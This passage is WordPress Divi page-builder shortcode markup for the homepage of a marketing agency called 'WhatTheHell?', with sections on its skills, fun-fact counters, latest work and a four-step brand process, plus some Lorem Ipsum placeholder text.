custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" 